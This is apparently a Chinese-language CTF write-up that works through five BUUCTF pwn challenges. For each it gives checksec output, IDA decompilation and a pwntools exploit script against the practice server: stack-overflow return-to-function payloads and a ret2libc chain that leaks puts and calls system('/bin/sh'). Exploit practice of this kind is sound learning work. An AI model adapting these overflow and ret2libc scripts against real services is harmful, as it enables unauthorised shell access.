http://www.joe1sn.top/blog/buuctf/buuctf-pwn-part2.html/
1.test_your_nc
nc + ls + cat flag
环境:Ubuntu 18
2.rip
环境:Ubuntu 18
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/rip/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
- 2.IDA
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+1h] [rbp-Fh]
puts("please input");
gets(&s, argv);
puts(&s);
puts("ok,bye!!!");
return 0;
}
string
LOAD:00000000004002A8 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:00000000004003B9 0000000A C libc.so.6
LOAD:00000000004003C3 00000005 C gets
LOAD:00000000004003C8 00000005 C puts
LOAD:00000000004003CD 00000007 C system
LOAD:00000000004003D4 00000012 C __libc_start_main
LOAD:00000000004003E6 0000000C C GLIBC_2.2.5
LOAD:00000000004003F2 0000000F C __gmon_start__
.rodata:0000000000402004 0000000D C please input
.rodata:0000000000402011 0000000A C ok,bye!!!
.rodata:000000000040201B 00000008 C /bin/sh
.eh_frame:00000000004020DF 00000006 C ;*3$\"
gets函数漏洞,有/bin/sh
- 3.EXP
from pwn import *
#context.log_level = "debug"
p = remote("node3.buuoj.cn",27035)
binsh_addr = 0x401186
payload = '\x00'*0xf + p64(binsh_addr)
p.sendline(payload)
p.interactive()
3.warmup_csaw_2016
环境:Ubuntu 16
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/warmup_csaw_2016/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
- 2.IDA
main
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-80h]
char v5; // [rsp+40h] [rbp-40h]
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p\n", sub_40060D);
write(1, &s, 9uLL);
write(1, ">", 1uLL);
return gets(&v5, ">");
}
string
LOAD:0000000000400238 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:0000000000400361 0000000A C libc.so.6
LOAD:000000000040036B 00000005 C gets
LOAD:0000000000400370 00000008 C sprintf
LOAD:0000000000400378 00000007 C system
LOAD:000000000040037F 00000012 C __libc_start_main
LOAD:0000000000400391 00000006 C write
LOAD:0000000000400397 0000000F C __gmon_start__
LOAD:00000000004003A6 0000000C C GLIBC_2.2.5
.rodata:0000000000400734 0000000D C cat flag.txt
.rodata:0000000000400741 0000000B C -Warm Up-\n
.rodata:000000000040074C 00000005 C WOW:
.eh_frame:00000000004007FF 00000006 C ;*3$\"
gets溢出,system函数和cat flag字符串
- 3.EXP
from pwn import *
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",28792)
cat_flag = 0x40060d
payload = '\x00'*(0x40+8) + p64(cat_flag)
p.sendlineafter(">",payload)
print p.recv()
p.interactive()
4.pwn1_sctf_2016
环境:ubuntu 16
- 1.checsec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/pwn1_sctf_2016/pwn1_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
- 2.IDA
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
vuln();
return 0;
}
vuln
int vuln()
{
const char *v0; // eax
char s; // [esp+1Ch] [ebp-3Ch]
char v3; // [esp+3Ch] [ebp-1Ch]
char v4; // [esp+40h] [ebp-18h]
char v5; // [esp+47h] [ebp-11h]
char v6; // [esp+48h] [ebp-10h]
char v7; // [esp+4Fh] [ebp-9h]
printf("Tell me something about yourself: ");
fgets(&s, 32, edata);
std::string::operator=(&input, &s);
std::allocator<char>::allocator(&v5);
std::string::string(&v4, "you", &v5);
std::allocator<char>::allocator(&v7);
std::string::string(&v6, "I", &v7);
replace((std::string *)&v3);
std::string::operator=(&input, &v3, &v6, &v4);
std::string::~string((std::string *)&v3);
std::string::~string((std::string *)&v6);
std::allocator<char>::~allocator(&v7);
std::string::~string((std::string *)&v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
strcpy(&s, v0);
return printf("So, %s\n", &s);
}
string
LOAD:08048154 00000013 C /lib/ld-linux.so.2
............. ........ . ..........
LOAD:080488F4 00000007 C strcpy
LOAD:080488FB 00000006 C stdin
LOAD:08048901 00000007 C printf
LOAD:08048908 00000006 C fgets
LOAD:0804890E 0000000D C __cxa_atexit
LOAD:0804891B 00000007 C system
LOAD:08048922 00000012 C __libc_start_main
LOAD:08048934 00000008 C GCC_3.0
LOAD:0804893C 0000000A C GLIBC_2.0
LOAD:08048946 0000000C C GLIBC_2.1.3
LOAD:08048952 0000000E C GLIBCXX_3.4.5
LOAD:08048960 0000000B C CXXABI_1.3
LOAD:0804896B 0000000C C GLIBCXX_3.4
.rodata:080497F0 0000000D C cat flag.txt
.rodata:08049800 00000023 C Tell me something about yourself:
.rodata:08049829 00000008 C So, %s\n
.rodata:08049834 0000002A C basic_string::_S_construct null not valid
.eh_frame:0804996F 00000005 C ;*2$\"
.eh_frame:0804999D 00000005 C zPLR
看上去不会溢出,但是把'I'替换成'you',使字符串变多,栈溢出
- 3.EXP
from pwn import *
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",25541)
cat_flag = 0x08048F0D
payload = 'I'*20 + 'a'*4 + p64(cat_flag)
p.sendline(payload)
p.interactive()
5.ciscn_2019_n_1
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/ciscn_2019_c_1/ciscn_2019_c_1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
- 2.IDA
main
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h]
init(*(_QWORD *)&argc, argv, envp);
puts("EEEEEEE hh iii ");
puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
puts("EE mmm mm mm aa aaa cc hh hh iii nn nn eeeee ");
puts("EEEEEEE mmm mm mm aaa aa ccccc hh hh iii nn nn eeeee ");
puts("====================================================================");
puts("Welcome to this Encryption machine\n");
begin("Welcome to this Encryption machine\n");
while ( 1 )
{
while ( 1 )
{
fflush(0LL);
v4 = 0;
__isoc99_scanf("%d", &v4);
getchar();
if ( v4 != 2 )
break;
puts("I think you can do it by yourself");
begin("I think you can do it by yourself");
}
if ( v4 == 3 )
{
puts("Bye!");
return 0;
}
if ( v4 != 1 )
break;
encrypt();
begin("%d");
}
puts("Something Wrong!");
return 0;
}
encrypt
int encrypt()
{
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h]
__int16 v3; // [rsp+30h] [rbp-20h]
memset(s, 0, sizeof(s));
v3 = 0;
puts("Input your Plaintext to be encrypted");
gets(s);
while ( 1 )
{
v0 = (unsigned int)x;
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;
}
else
{
s[x] ^= 0xEu;
}
}
else
{
s[x] ^= 0xDu;
}
++x;
}
puts("Ciphertext");
return puts(s);
}
没有binsh字符串,没有system函数,应该是一个puts函数泄露libc的题
BUUCTF的resource一栏有libc.so文件
- 3.EXP
from pwn import *
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",25460)
elf = ELF("./ciscn_2019_c_1")
libc = ELF("./libc-2.27.so")
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
libc_puts = libc.sym["puts"]
system = libc.sym["system"]
binsh = next(libc.search('/bin/sh'))
pop_rdi = 0x0400c83
leave_ret = 0x04006b9
payload = 'A'*(0x50+8) + p64(pop_rdi)+ p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.recvuntil("Input your choice!\n")
p.sendline("1")
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload)
p.recvuntil('@\n')
puts_real = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_real - libc_puts
system_real = system + libc_base
binsh_real = binsh + libc_base
payload = '\x00'*(0x50+8) + p64(leave_ret) + p64(pop_rdi) + p64(binsh_real) + p64(system_real)
p.recvuntil("Input your choice!\n")
p.sendline("1")
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload)
p.interactive()
还有一个坑就是Ubuntu18下面调用system要对齐栈,就需要用一个ret
参照EXP:https://www.jianshu.com/p/f6839b1e7283
